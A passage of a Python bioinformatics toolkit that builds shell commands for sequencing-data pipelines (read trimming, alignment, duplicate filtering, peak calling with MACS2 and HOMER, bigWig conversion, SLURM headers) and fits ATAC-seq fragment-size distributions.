else self.count_lines(file_name)\n )\n divisor = 2 if paired_end else 4\n return int(num_lines) / divisor\n\n def count_concordant(self, aligned_bam):\n \"\"\"\n Count only reads that \"aligned concordantly exactly 1 time.\"\n\n :param str aligned_bam: File for which to count mapped reads.\n \"\"\"\n cmd = self.tools.samtools + \" view \" + aligned_bam + \" | \"\n cmd += \"grep 'YT:Z:CP'\" + \" | uniq -u | wc -l | sed -E 's/^[[:space:]]+//'\"\n\n return subprocess.check_output(cmd, shell=True).decode().strip()\n\n def count_mapped_reads(self, file_name, paired_end):\n \"\"\"\n Mapped_reads are not in fastq format, so this one doesn't need to accommodate fastq,\n and therefore, doesn't require a paired-end parameter because it only uses samtools view.\n Therefore, it's ok that it has a default parameter, since this is discarded.\n\n :param str file_name: File for which to count mapped reads.\n :param bool paired_end: This parameter is ignored; samtools automatically correctly responds depending\n on the data in the bamfile. We leave the option here just for consistency, since all the other\n counting functions require the parameter. This makes it easier to swap counting functions during\n pipeline development.\n :return int: Either return code from samtools view command, or -1 to indicate an error state.\n \"\"\"\n if file_name.endswith(\"bam\"):\n return self.samtools_view(file_name, param=\"-c -F4\")\n if file_name.endswith(\"sam\"):\n return self.samtools_view(file_name, param=\"-c -F4 -S\")\n return -1\n\n def sam_conversions(self, sam_file, depth=True):\n \"\"\"\n Convert sam files to bam files, then sort and index them for later use.\n\n :param bool depth: also calculate coverage over each position\n \"\"\"\n cmd = (\n self.tools.samtools\n + \" view -bS \"\n + sam_file\n + \" > \"\n + sam_file.replace(\".sam\", \".bam\")\n + \"\\n\"\n )\n cmd += (\n self.tools.samtools\n + \" sort \"\n + sam_file.replace(\".sam\", \".bam\")\n + \" -o \"\n + sam_file.replace(\".sam\", \"_sorted.bam\")\n + \"\\n\"\n )\n cmd += (\n self.tools.samtools\n + \" index \"\n + sam_file.replace(\".sam\", \"_sorted.bam\")\n + \"\\n\"\n )\n if depth:\n cmd += (\n self.tools.samtools\n + \" depth \"\n + sam_file.replace(\".sam\", \"_sorted.bam\")\n + \" > \"\n + sam_file.replace(\".sam\", \"_sorted.depth\")\n + \"\\n\"\n )\n return cmd\n\n def bam_conversions(self, bam_file, depth=True):\n \"\"\"\n Sort and index bam files for later use.\n\n :param bool depth: also calculate coverage over each position\n \"\"\"\n cmd = (\n self.tools.samtools\n + \" view -h \"\n + bam_file\n + \" > \"\n + bam_file.replace(\".bam\", \".sam\")\n + \"\\n\"\n )\n cmd += (\n self.tools.samtools\n + \" sort \"\n + bam_file\n + \" -o \"\n + bam_file.replace(\".bam\", \"_sorted.bam\")\n + \"\\n\"\n )\n cmd += (\n self.tools.samtools\n + \" index \"\n + bam_file.replace(\".bam\", \"_sorted.bam\")\n + \"\\n\"\n )\n if depth:\n cmd += (\n self.tools.samtools\n + \" depth \"\n + bam_file.replace(\".bam\", \"_sorted.bam\")\n + \" > \"\n + bam_file.replace(\".bam\", \"_sorted.depth\")\n + \"\\n\"\n )\n return cmd\n\n def fastqc(self, file, output_dir):\n \"\"\"\n Create command to run fastqc on a FASTQ file\n\n :param str file: Path to file with sequencing reads\n :param str output_dir: Path to folder in which to place output\n :return str: Command with which to run fastqc\n \"\"\"\n # You can find the fastqc help with fastqc --help\n try:\n pm = self.pm\n except AttributeError:\n # Do nothing, this is just for path construction.\n pass\n else:\n if not os.path.isabs(output_dir) and pm is not None:\n output_dir = os.path.join(pm.outfolder, output_dir)\n self.make_sure_path_exists(output_dir)\n return \"{} --noextract --outdir {} {}\".format(\n self.tools.fastqc, output_dir, file\n )\n\n def fastqc_rename(self, input_bam, output_dir, sample_name):\n \"\"\"\n Create pair of commands to run fastqc and organize files.\n\n The first command returned is the one that actually runs fastqc when\n it's executed; the second moves the output files to the output\n folder for the sample indicated.\n\n :param str input_bam: Path to file for which to run fastqc.\n :param str output_dir: Path to folder in which fastqc output will be\n written, and within which the sample's output folder lives.\n :param str sample_name: Sample name, which determines subfolder within\n output_dir for the fastqc files.\n :return list[str]: Pair of commands, to run fastqc and then move the files to\n their intended destination based on sample name.\n \"\"\"\n cmds = list()\n initial = os.path.splitext(os.path.basename(input_bam))[0]\n cmd1 = self.fastqc(input_bam, output_dir)\n cmds.append(cmd1)\n cmd2 = \"if [[ ! -s {1}_fastqc.html ]]; then mv {0}_fastqc.html {1}_fastqc.html; mv {0}_fastqc.zip {1}_fastqc.zip; fi\".format(\n os.path.join(output_dir, initial), os.path.join(output_dir, sample_name)\n )\n cmds.append(cmd2)\n return cmds\n\n def samtools_index(self, bam_file):\n \"\"\"Index a bam file.\"\"\"\n cmd = self.tools.samtools + \" index {0}\".format(bam_file)\n return cmd\n\n def slurm_header(\n self,\n job_name,\n output,\n queue=\"shortq\",\n n_tasks=1,\n time=\"10:00:00\",\n cpus_per_task=8,\n mem_per_cpu=2000,\n nodes=1,\n user_mail=\"\",\n mail_type=\"end\",\n ):\n cmd = \"\"\" #!/bin/bash\n #SBATCH --partition={0}\n #SBATCH --ntasks={1}\n #SBATCH --time={2}\n\n #SBATCH --cpus-per-task={3}\n #SBATCH --mem-per-cpu={4}\n #SBATCH --nodes={5}\n\n #SBATCH --job-name={6}\n #SBATCH --output={7}\n\n #SBATCH --mail-type={8}\n #SBATCH --mail-user={9}\n\n # Start running the job\n hostname\n date\n\n \"\"\".format(\n queue,\n n_tasks,\n time,\n cpus_per_task,\n mem_per_cpu,\n nodes,\n job_name,\n output,\n mail_type,\n user_mail,\n )\n\n return cmd\n\n def slurm_footer(self):\n return \" date\"\n\n def slurm_submit_job(self, job_file):\n return os.system(\"sbatch %s\" % job_file)\n\n def remove_file(self, file_name):\n return \"rm {0}\".format(file_name)\n\n def move_file(self, old, new):\n return \"mv {0} {1}\".format(old, new)\n\n def preseq_curve(self, bam_file, output_prefix):\n return \"\"\"\n preseq c_curve -B -P -o {0}.yield.txt {1}\n \"\"\".format(\n output_prefix, bam_file\n )\n\n def preseq_extrapolate(self, bam_file, output_prefix):\n return \"\"\"\n preseq lc_extrap -v -B -P -e 1e+9 -o {0}.future_yield.txt {1}\n \"\"\".format(\n output_prefix, bam_file\n )\n\n def preseq_coverage(self, bam_file, output_prefix):\n return \"\"\"\n preseq gc_extrap -o {0}.future_coverage.txt {1}\n \"\"\".format(\n output_prefix, bam_file\n )\n\n def trimmomatic(\n self,\n input_fastq1,\n output_fastq1,\n cpus,\n adapters,\n log,\n input_fastq2=None,\n output_fastq1_unpaired=None,\n output_fastq2=None,\n output_fastq2_unpaired=None,\n ):\n PE = False if input_fastq2 is None else True\n pe = \"PE\" if PE else \"SE\"\n cmd = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd += \" -jar \" + self.tools.trimmomatic\n cmd += \" {0} -threads {1} -trimlog {2} {3}\".format(pe, cpus, log, input_fastq1)\n if PE:\n cmd += \" {0}\".format(input_fastq2)\n cmd += \" {0}\".format(output_fastq1)\n if PE:\n cmd += \" {0} {1} {2}\".format(\n output_fastq1_unpaired, output_fastq2, output_fastq2_unpaired\n )\n cmd += \" ILLUMINACLIP:{0}:1:40:15:8:true\".format(adapters)\n cmd += \" LEADING:3 TRAILING:3\"\n cmd += \" SLIDINGWINDOW:4:10\"\n cmd += \" MINLEN:36\"\n return cmd\n\n def skewer(\n self,\n input_fastq1,\n output_prefix,\n output_fastq1,\n log,\n cpus,\n adapters,\n input_fastq2=None,\n output_fastq2=None,\n ):\n \"\"\"\n Create commands with which to run skewer.\n\n :param str input_fastq1: Path to input (read 1) FASTQ file\n :param str output_prefix: Prefix for output FASTQ file names\n :param str output_fastq1: Path to (read 1) output FASTQ file\n :param str log: Path to file to which to write logging information\n :param int | str cpus: Number of processing cores to allow\n :param str adapters: Path to file with sequencing adapters\n :param str input_fastq2: Path to read 2 input FASTQ file\n :param str output_fastq2: Path to read 2 output FASTQ file\n :return list[str]: Sequence of commands to run to trim reads with\n skewer and rename files as desired.\n \"\"\"\n\n pe = input_fastq2 is not None\n mode = \"pe\" if pe else \"any\"\n cmds = list()\n cmd1 = self.tools.skewer + \" --quiet\"\n cmd1 += \" -f sanger\"\n cmd1 += \" -t {0}\".format(cpus)\n cmd1 += \" -m {0}\".format(mode)\n cmd1 += \" -x {0}\".format(adapters)\n cmd1 += \" -o {0}\".format(output_prefix)\n cmd1 += \" {0}\".format(input_fastq1)\n if input_fastq2 is None:\n cmds.append(cmd1)\n else:\n cmd1 += \" {0}\".format(input_fastq2)\n cmds.append(cmd1)\n if input_fastq2 is None:\n cmd2 = \"mv {0} {1}\".format(output_prefix + \"-trimmed.fastq\", output_fastq1)\n cmds.append(cmd2)\n else:\n cmd2 = \"mv {0} {1}\".format(\n output_prefix + \"-trimmed-pair1.fastq\", output_fastq1\n )\n cmds.append(cmd2)\n cmd3 = \"mv {0} {1}\".format(\n output_prefix + \"-trimmed-pair2.fastq\", output_fastq2\n )\n cmds.append(cmd3)\n cmd4 = \"mv {0} {1}\".format(output_prefix + \"-trimmed.log\", log)\n cmds.append(cmd4)\n return cmds\n\n def bowtie2_map(\n self,\n input_fastq1,\n output_bam,\n log,\n metrics,\n genome_index,\n max_insert,\n cpus,\n input_fastq2=None,\n ):\n # Admits 2000bp-long fragments (--maxins option)\n cmd = self.tools.bowtie2 + \" --very-sensitive --no-discordant -p {0}\".format(\n cpus\n )\n cmd += \" -x {0}\".format(genome_index)\n cmd += \" --met-file {0}\".format(metrics)\n if input_fastq2 is None:\n cmd += \" {0} \".format(input_fastq1)\n else:\n cmd += \" --maxins {0}\".format(max_insert)\n cmd += \" -1 {0}\".format(input_fastq1)\n cmd += \" -2 {0}\".format(input_fastq2)\n cmd += \" 2> {0} | samtools view -S -b - | samtools sort -o {1} -\".format(\n log, output_bam\n )\n return cmd\n\n def topHat_map(self, input_fastq, output_dir, genome, transcriptome, cpus):\n # TODO:\n # Allow paired input\n cmd = (\n self.tools.tophat\n + \" --GTF {0} --b2-L 15 --library-type fr-unstranded --mate-inner-dist 120\".format(\n transcriptome\n )\n )\n cmd += \" --max-multihits 100 --no-coverage-search\"\n cmd += \" --num-threads {0} --output-dir {1} {2} {3}\".format(\n cpus, output_dir, genome, input_fastq\n )\n return cmd\n\n def picard_mark_duplicates(self, input_bam, output_bam, metrics_file, temp_dir=\".\"):\n transient_file = re.sub(\"\\.bam$\", \"\", output_bam) + \".dups.nosort.bam\"\n output_bam = re.sub(\"\\.bam$\", \"\", output_bam)\n cmd1 = self.tools.java + \" -Xmx\" + self.pm.javamem\n cmd1 += \" -jar `which MarkDuplicates.jar`\"\n cmd1 += \" INPUT={0}\".format(input_bam)\n cmd1 += \" OUTPUT={0}\".format(transient_file)\n cmd1 += \" METRICS_FILE={0}\".format(metrics_file)\n cmd1 += \" VALIDATION_STRINGENCY=LENIENT\"\n cmd1 += \" TMP_DIR={0}\".format(temp_dir)\n # Sort bam file with marked duplicates\n cmd2 = self.tools.samtools + \" sort {0} {1}\".format(transient_file, output_bam)\n # Remove transient file\n cmd3 = \"if [[ -s {0} ]]; then rm {0}; fi\".format(transient_file)\n return [cmd1, cmd2, cmd3]\n\n def sambamba_remove_duplicates(self, input_bam, output_bam, cpus=16):\n cmd = self.tools.sambamba + \" markdup -t {0} -r {1} {2}\".format(\n cpus, input_bam, output_bam\n )\n return cmd\n\n def get_mitochondrial_reads(self, bam_file, output, cpus=4):\n \"\"\" \"\"\"\n tmp_bam = bam_file + \"tmp_rmMe\"\n cmd1 = self.tools.sambamba + \" index -t {0} {1}\".format(cpus, bam_file)\n cmd2 = (\n self.tools.sambamba\n + \" slice {0} chrM | {1} markdup -t 4 /dev/stdin {2} 2> {3}\".format(\n bam_file, self.tools.sambamba, tmp_bam, output\n )\n )\n cmd3 = \"rm {}\".format(tmp_bam)\n return [cmd1, cmd2, cmd3]\n\n def filter_reads(\n self, input_bam, output_bam, metrics_file, paired=False, cpus=16, Q=30\n ):\n \"\"\"\n Remove duplicates, filter for >Q, remove multiple mapping reads.\n For paired-end reads, keep only proper pairs.\n \"\"\"\n nodups = re.sub(\"\\.bam$\", \"\", output_bam) + \".nodups.nofilter.bam\"\n cmd1 = (\n self.tools.sambamba\n + \" markdup -t {0} -r --compression-level=0 {1} {2} 2> {3}\".format(\n cpus, input_bam, nodups, metrics_file\n )\n )\n cmd2 = self.tools.sambamba + \" view -t {0} -f bam --valid\".format(cpus)\n if paired:\n cmd2 += ' -F \"not (unmapped or mate_is_unmapped) and proper_pair'\n else:\n cmd2 += ' -F \"not unmapped'\n cmd2 += ' and not (secondary_alignment or supplementary) and mapping_quality >= {0}\"'.format(\n Q\n )\n cmd2 += \" {0} |\".format(nodups)\n cmd2 += self.tools.sambamba + \" sort -t {0} /dev/stdin -o {1}\".format(\n cpus, output_bam\n )\n cmd3 = \"if [[ -s {0} ]]; then rm {0}; fi\".format(nodups)\n cmd4 = \"if [[ -s {0} ]]; then rm {0}; fi\".format(nodups + \".bai\")\n return [cmd1, cmd2, cmd3, cmd4]\n\n def shift_reads(self, input_bam, genome, output_bam):\n # output_bam = re.sub(\"\\.bam$\", \"\", output_bam)\n cmd = self.tools.samtools + \" view -h {0} |\".format(input_bam)\n cmd += \" shift_reads.py {0} |\".format(genome)\n cmd += \" \" + self.tools.samtools + \" view -S -b - |\"\n cmd += \" \" + self.tools.samtools + \" sort -o {0} -\".format(output_bam)\n return cmd\n\n def sort_index_bam(self, input_bam, output_bam):\n tmp_bam = re.sub(\"\\.bam\", \".sorted\", input_bam)\n cmd1 = self.tools.samtools + \" sort {0} {1}\".format(input_bam, tmp_bam)\n cmd2 = \"mv {0}.bam {1}\".format(tmp_bam, output_bam)\n cmd3 = self.tools.samtools + \" index {0}\".format(output_bam)\n return [cmd1, cmd2, cmd3]\n\n def index_bam(self, input_bam):\n cmd = self.tools.samtools + \" index {0}\".format(input_bam)\n return cmd\n\n def run_spp(self, input_bam, output, plot, cpus):\n \"\"\"\n Run the SPP read peak analysis tool.\n\n :param str input_bam: Path to reads file\n :param str output: Path to output file\n :param str plot: Path to plot file\n :param int cpus: Number of processors to use\n :return str: Command with which to run SPP\n \"\"\"\n base = \"{} {} -rf -savp\".format(self.tools.Rscript, self.tools.spp)\n cmd = base + \" -savp={} -s=0:5:500 -c={} -out={} -p={}\".format(\n plot, input_bam, output, cpus\n )\n return cmd\n\n def get_fragment_sizes(self, bam_file):\n try:\n import numpy as np\n import pysam\n except:\n return\n frag_sizes = list()\n bam = pysam.Samfile(bam_file, \"rb\")\n for read in bam:\n if bam.getrname(read.tid) != \"chrM\" and read.tlen < 1500:\n frag_sizes.append(read.tlen)\n bam.close()\n return np.array(frag_sizes)\n\n def plot_atacseq_insert_sizes(\n self, bam, plot, output_csv, max_insert=1500, smallest_insert=30\n ):\n \"\"\"\n Heavy inspiration from here:\n https://github.com/dbrg77/ATAC/blob/master/ATAC_seq_read_length_curve_fitting.ipynb\n \"\"\"\n try:\n import matplotlib\n import matplotlib.mlab as mlab\n import numpy as np\n import pysam\n from scipy.integrate import simps\n from scipy.optimize import curve_fit\n\n matplotlib.use(\"Agg\")\n import matplotlib.pyplot as plt\n except:\n print(\"Necessary Python modules couldn't be loaded.\")\n return\n\n try:\n import seaborn as sns\n\n sns.set_style(\"whitegrid\")\n except:\n pass\n\n def get_fragment_sizes(bam, max_insert=1500):\n frag_sizes = list()\n\n bam = pysam.Samfile(bam, \"rb\")\n\n for i, read in enumerate(bam):\n if read.tlen < max_insert:\n frag_sizes.append(read.tlen)\n bam.close()\n\n return np.array(frag_sizes)\n\n def mixture_function(x, *p):\n \"\"\"\n Mixture function to model four gaussian (nucleosomal)\n and one exponential (nucleosome-free) distributions.\n \"\"\"\n m1, s1, w1, m2, s2, w2, m3, s3, w3, m4, s4, w4, q, r = p\n nfr = expo(x, 2.9e-02, 2.8e-02)\n nfr[:smallest_insert] = 0\n\n return (\n mlab.normpdf(x, m1, s1) * w1\n + mlab.normpdf(x, m2, s2) * w2\n + mlab.normpdf(x, m3, s3) * w3\n + mlab.normpdf(x, m4, s4) * w4\n + nfr\n )\n\n def expo(x, q, r):\n \"\"\"\n Exponential function.\n \"\"\"\n return q * np.exp(-r * x)\n\n # get fragment sizes\n frag_sizes = get_fragment_sizes(bam)\n\n # bin\n numBins = np.linspace(0, max_insert, max_insert + 1)\n y, scatter_x = np.histogram(frag_sizes, numBins, density=1)\n # get the mid-point of each bin\n x = (scatter_x[:-1] + scatter_x[1:]) / 2\n\n # Parameters are empirical, need to check\n paramGuess = [\n 200,\n 50,\n 0.7, # gaussians\n 400,\n 50,\n 0.15,\n 600,\n 50,\n 0.1,\n 800,\n 55,\n 0.045,\n 2.9e-02,\n 2.8e-02, # exponential\n ]\n\n try:\n popt3, pcov3 = curve_fit(\n mixture_function,\n x[smallest_insert:],\n y[smallest_insert:],\n p0=paramGuess,\n maxfev=100000,\n )\n except:\n print(\"Nucleosomal fit could not be found.\")\n return\n\n m1, s1, w1, m2, s2, w2, m3, s3, w3, m4, s4, w4, q, r = popt3\n\n # Plot\n plt.figure(figsize=(12, 12))\n\n # Plot distribution\n plt.hist(frag_sizes, numBins, histtype=\"step\", ec=\"k\", normed=1, alpha=0.5)\n\n # Plot nucleosomal fits\n plt.plot(x, mlab.normpdf(x, m1, s1) * w1, \"r-\", lw=1.5, label=\"1st nucleosome\")\n plt.plot(x, mlab.normpdf(x, m2, s2) * w2, \"g-\", lw=1.5, label=\"2nd nucleosome\")\n plt.plot(x, mlab.normpdf(x, m3, s3) * w3, \"b-\", lw=1.5, label=\"3rd nucleosome\")\n plt.plot(x, mlab.normpdf(x, m4, s4) * w4, \"c-\", lw=1.5, label=\"4th nucleosome\")\n\n # Plot nucleosome-free fit\n nfr = expo(x, 2.9e-02, 2.8e-02)\n nfr[:smallest_insert] = 0\n plt.plot(x, nfr, \"k-\", lw=1.5, label=\"nucleosome-free\")\n\n # Plot sum of fits\n ys = mixture_function(x, *popt3)\n plt.plot(x, ys, \"k--\", lw=3.5, label=\"fit sum\")\n\n plt.legend()\n plt.xlabel(\"Fragment size (bp)\")\n plt.ylabel(\"Density\")\n plt.savefig(plot, bbox_inches=\"tight\")\n\n # Integrate curves and get areas under curve\n areas = [\n [\"fraction\", \"area under curve\", \"max density\"],\n [\"Nucleosome-free fragments\", simps(nfr), max(nfr)],\n [\n \"1st nucleosome\",\n simps(mlab.normpdf(x, m1, s1) * w1),\n max(mlab.normpdf(x, m1, s1) * w1),\n ],\n [\n \"2nd nucleosome\",\n simps(mlab.normpdf(x, m2, s2) * w1),\n max(mlab.normpdf(x, m2, s2) * w2),\n ],\n [\n \"3rd nucleosome\",\n simps(mlab.normpdf(x, m3, s3) * w1),\n max(mlab.normpdf(x, m3, s3) * w3),\n ],\n [\n \"4th nucleosome\",\n simps(mlab.normpdf(x, m4, s4) * w1),\n max(mlab.normpdf(x, m4, s4) * w4),\n ],\n ]\n\n try:\n import csv\n\n with open(output_csv, \"w\") as f:\n writer = csv.writer(f)\n writer.writerows(areas)\n except:\n pass\n\n # TODO: parameterize in terms of normalization factor.\n def bam_to_bigwig(\n self,\n input_bam,\n output_bigwig,\n genome_sizes,\n genome,\n tagmented=False,\n normalize=False,\n norm_factor=1000,\n ):\n \"\"\"\n Convert a BAM file to a bigWig file.\n\n :param str input_bam: path to BAM file to convert\n :param str output_bigwig: path to which to write file in bigwig format\n :param str genome_sizes: path to file with chromosome size information\n :param str genome: name of genomic assembly\n :param bool tagmented: flag related to read-generating protocol\n :param bool normalize: whether to normalize coverage\n :param int norm_factor: number of bases to use for normalization\n :return list[str]: sequence of commands to execute\n \"\"\"\n # TODO:\n # addjust fragment length dependent on read size and real fragment size\n # (right now it asssumes 50bp reads with 180bp fragments)\n cmds = list()\n transient_file = os.path.abspath(re.sub(\"\\.bigWig\", \"\", output_bigwig))\n cmd1 = self.tools.bedtools + \" bamtobed -i {0} |\".format(input_bam)\n if not tagmented:\n cmd1 += (\n \" \"\n + self.tools.bedtools\n + \" slop -i stdin -g {0} -s -l 0 -r 130 |\".format(genome_sizes)\n )\n cmd1 += \" fix_bedfile_genome_boundaries.py {0} |\".format(genome)\n cmd1 += (\n \" \"\n + self.tools.genomeCoverageBed\n + \" {0}-bg -g {1} -i stdin > {2}.cov\".format(\n \"-5 \" if tagmented else \"\", genome_sizes, transient_file\n )\n )\n cmds.append(cmd1)\n if normalize:\n cmds.append(\n \"\"\"awk 'NR==FNR{{sum+= $4; next}}{{ $4 = ($4 / sum) * {1}; print}}' {0}.cov {0}.cov | sort -k1,1 -k2,2n > {0}.normalized.cov\"\"\".format(\n transient_file, norm_factor\n )\n )\n cmds.append(\n self.tools.bedGraphToBigWig\n + \" {0}{1}.cov {2} {3}\".format(\n transient_file,\n \".normalized\" if normalize else \"\",\n genome_sizes,\n output_bigwig,\n )\n )\n # remove tmp files\n cmds.append(\"if [[ -s {0}.cov ]]; then rm {0}.cov; fi\".format(transient_file))\n if normalize:\n cmds.append(\n \"if [[ -s {0}.normalized.cov ]]; then rm {0}.normalized.cov; fi\".format(\n transient_file\n )\n )\n cmds.append(\"chmod 755 {0}\".format(output_bigwig))\n return cmds\n\n def add_track_to_hub(\n self, sample_name, track_url, track_hub, colour, five_prime=\"\"\n ):\n cmd1 = (\n \"\"\"echo \"track type=bigWig name='{0} {1}' description='{0} {1}'\"\"\".format(\n sample_name, five_prime\n )\n )\n cmd1 += \"\"\" height=32 visibility=full maxHeightPixels=32:32:25 bigDataUrl={0} color={1}\" >> {2}\"\"\".format(\n track_url, colour, track_hub\n )\n cmd2 = \"chmod 755 {0}\".format(track_hub)\n return [cmd1, cmd2]\n\n def link_to_track_hub(self, track_hub_url, file_name, genome):\n import textwrap\n\n db = \"org\" if genome == \"hg19\" else \"db\" # different database call for human\n genome = \"human\" if genome == \"hg19\" else genome # change hg19 to human\n html = \"\"\"\n \n \n \n \n \n \"\"\".format(\n track_hub_url=track_hub_url, genome=genome, db=db\n )\n with open(file_name, \"w\") as handle:\n handle.write(textwrap.dedent(html))\n\n def htseq_count(self, input_bam, gtf, output):\n sam = input_bam.replace(\"bam\", \"sam\")\n cmd1 = \"samtools view {0} > {1}\".format(input_bam, sam)\n cmd2 = (\n \"htseq-count -f sam -t exon -i transcript_id -m union {0} {1} > {2}\".format(\n sam, gtf, output\n )\n )\n cmd3 = \"rm {0}\".format(sam)\n return [cmd1, cmd2, cmd3]\n\n def kallisto(\n self,\n input_fastq,\n output_dir,\n output_bam,\n transcriptome_index,\n cpus,\n input_fastq2=None,\n size=180,\n b=200,\n ):\n cmd1 = (\n self.tools.kallisto\n + \" quant --bias --pseudobam -b {0} -l {1} -i {2} -o {3} -t {4}\".format(\n b, size, transcriptome_index, output_dir, cpus\n )\n )\n if input_fastq2 is None:\n cmd1 += \" --single {0}\".format(input_fastq)\n else:\n cmd1 += \" {0} {1}\".format(input_fastq, input_fastq2)\n cmd1 += \" | \" + self.tools.samtools + \" view -Sb - > {0}\".format(output_bam)\n cmd2 = self.tools.kallisto + \" h5dump -o {0} {0}/abundance.h5\".format(\n output_dir\n )\n return [cmd1, cmd2]\n\n def genome_wide_coverage(self, input_bam, genome_windows, output):\n cmd = self.tools.bedtools + \" coverage -counts -abam {0} -b {1} > {2}\".format(\n input_bam, genome_windows, output\n )\n return cmd\n\n def calc_frip(self, input_bam, input_bed, threads=4):\n \"\"\"\n Calculate fraction of reads in peaks.\n\n A file of with a pool of sequencing reads and a file with peak call\n regions define the operation that will be performed. Thread count\n for samtools can be specified as well.\n\n :param str input_bam: sequencing reads file\n :param str input_bed: file with called peak regions\n :param int threads: number of threads samtools may use\n :return float: fraction of reads in peaks defined in given peaks file\n \"\"\"\n cmd = self.simple_frip(input_bam, input_bed, threads)\n return subprocess.check_output(cmd.split(\" \"), shell=True).decode().strip()\n\n def simple_frip(self, input_bam, input_bed, threads=4):\n cmd = \"{} view\".format(self.tools.samtools)\n cmd += \" -@ {} -c -L {}\".format(threads, input_bed)\n cmd += \" \" + input_bam\n return cmd\n\n def calculate_frip(self, input_bam, input_bed, output, cpus=4):\n cmd = self.tools.sambamba + \" depth region -t {0}\".format(cpus)\n cmd += \" -L {0}\".format(input_bed)\n cmd += \" {0}\".format(input_bam)\n cmd += \" | awk '{{sum+=$5}} END {{print sum}}' > {0}\".format(output)\n return cmd\n\n def macs2_call_peaks(\n self,\n treatment_bams,\n output_dir,\n sample_name,\n genome,\n control_bams=None,\n broad=False,\n paired=False,\n pvalue=None,\n qvalue=None,\n include_significance=None,\n ):\n \"\"\"\n Use MACS2 to call peaks.\n\n :param str | Iterable[str] treatment_bams: Paths to files with data to\n regard as treatment.\n :param str output_dir: Path to output folder.\n :param str sample_name: Name for the sample involved.\n :param str genome: Name of the genome assembly to use.\n :param str | Iterable[str] control_bams: Paths to files with data to\n regard as control\n :param bool broad: Whether to do broad peak calling.\n :param bool paired: Whether reads are paired-end\n :param float | NoneType pvalue: Statistical significance measure to\n pass as --pvalue to peak calling with MACS\n :param float | NoneType qvalue: Statistical significance measure to\n pass as --qvalue to peak calling with MACS\n :param bool | NoneType include_significance: Whether to pass a\n statistical significance argument to peak calling with MACS; if\n omitted, this will be True if the peak calling is broad or if\n either p-value or q-value is specified; default significance\n specification is a p-value of 0.001 if a significance is to be\n specified but no value is provided for p-value or q-value.\n :return str: Command to run.\n \"\"\"\n sizes = {\n \"hg38\": 2.7e9,\n \"hg19\": 2.7e9,\n \"mm10\": 1.87e9,\n \"dr7\": 1.412e9,\n \"mm9\": 1.87e9,\n }\n\n # Whether to specify to MACS2 a value for statistical significance\n # can be either directly indicated, but if not, it's determined by\n # whether the mark is associated with broad peaks. By default, we\n # specify a significance value to MACS2 for a mark associated with a\n # broad peak.\n if include_significance is None:\n include_significance = broad\n\n cmd = self.tools.macs2 + \" callpeak -t {0}\".format(\n treatment_bams if type(treatment_bams) is str else \" \".join(treatment_bams)\n )\n\n if control_bams is not None:\n cmd += \" -c {0}\".format(\n control_bams if type(control_bams) is str else \" \".join(control_bams)\n )\n\n if paired:\n cmd += \" -f BAMPE \"\n\n # Additional settings based on whether the marks is associated with\n # broad peaks\n if broad:\n cmd += \" --broad --nomodel --extsize 73\"\n else:\n cmd += \" --fix-bimodal --extsize 180 --bw 200\"\n\n if include_significance:\n # Allow significance specification via either p- or q-value,\n # giving preference to q-value if both are provided but falling\n # back on a default p-value if neither is provided but inclusion\n # of statistical significance measure is desired.\n if qvalue is not None:\n cmd += \" --qvalue {}\".format(qvalue)\n else:\n cmd += \" --pvalue {}\".format(pvalue or 0.00001)\n cmd += \" -g {0} -n {1} --outdir {2}\".format(\n sizes[genome], sample_name, output_dir\n )\n\n return cmd\n\n def macs2_call_peaks_atacseq(self, treatment_bam, output_dir, sample_name, genome):\n genome_sizes = {\n \"hg38\": 2.7e9,\n \"hg19\": 2.7e9,\n \"mm10\": 1.87e9,\n \"dr7\": 1.412e9,\n \"mm9\": 1.87e9,\n }\n cmd = self.tools.macs2 + \" callpeak -t {0}\".format(treatment_bam)\n cmd += \" --nomodel --extsize 147 -g {0} -n {1} --outdir {2}\".format(\n genome_sizes[genome], sample_name, output_dir\n )\n return cmd\n\n def macs2_plot_model(self, r_peak_model_file, sample_name, output_dir):\n # run macs r script\n cmd1 = \"{} {}\".format(self.tools.Rscript, r_peak_model_file)\n # move output plot to sample dir\n cmd2 = \"mv {0}/{1}_model.pdf {2}/{1}_model.pdf\".format(\n os.getcwd(), sample_name, output_dir\n )\n return [cmd1, cmd2]\n\n def spp_call_peaks(\n self,\n treatment_bam,\n control_bam,\n treatment_name,\n control_name,\n output_dir,\n broad,\n cpus,\n qvalue=None,\n ):\n \"\"\"\n Build command for R script to call peaks with SPP.\n\n :param str treatment_bam: Path to file with data for treatment sample.\n :param str control_bam: Path to file with data for control sample.\n :param str treatment_name: Name for the treatment sample.\n :param str control_name: Name for the control sample.\n :param str output_dir: Path to folder for output.\n :param str | bool broad: Whether to specify broad peak calling mode.\n :param int cpus: Number of cores the script may use.\n :param float qvalue: FDR, as decimal value\n :return str: Command to run.\n \"\"\"\n broad = \"TRUE\" if broad else \"FALSE\"\n cmd = (\n self.tools.Rscript\n + \" `which spp_peak_calling.R` {0} {1} {2} {3} {4} {5} {6}\".format(\n treatment_bam,\n control_bam,\n treatment_name,\n control_name,\n broad,\n cpus,\n output_dir,\n )\n )\n if qvalue is not None:\n cmd += \" {}\".format(qvalue)\n return cmd\n\n def bam_to_bed(self, input_bam, output_bed):\n cmd = self.tools.bedtools + \" bamtobed -i {0} > {1}\".format(\n input_bam, output_bed\n )\n return cmd\n\n def zinba_call_peaks(self, treatment_bed, control_bed, cpus, tagmented=False):\n fragmentLength = 80 if tagmented else 180\n cmd = self.tools.Rscript + \" `which zinba.R` -l {0} -t {1} -c {2}\".format(\n fragmentLength, treatment_bed, control_bed\n )\n return cmd\n\n def filter_peaks_mappability(self, peaks, alignability, filtered_peaks):\n cmd = self.tools.bedtools + \" intersect -wa -u -f 1\"\n cmd += \" -a {0} -b {1} > {2} \".format(peaks, alignability, filtered_peaks)\n return cmd\n\n def homer_find_motifs(\n self,\n peak_file,\n genome,\n output_dir,\n size=150,\n length=\"8,10,12,14,16\",\n n_motifs=12,\n ):\n cmd = \"findMotifsGenome.pl {0} {1} {2}\".format(peak_file, genome, output_dir)\n cmd += \" -mask -size {0} -len {1} -S {2}\".format(size, length, n_motifs)\n return cmd\n\n def homer_annotate_pPeaks(self, peak_file, genome, motif_file, output_bed):\n cmd = \"annotatePeaks.pl {0} {1} -mask -mscore -m {2} |\".format(\n peak_file, genome, motif_file\n )\n cmd += \"tail -n +2 | cut -f 1,5,22 > {3}\".format(output_bed)\n return cmd\n\n def center_peaks_on_motifs(\n self, peak_file, genome, window_width, motif_file, output_bed\n ):\n cmd = \"annotatePeaks.pl {0} {1} -size {2} -center {3} |\".format(\n peak_file, genome, 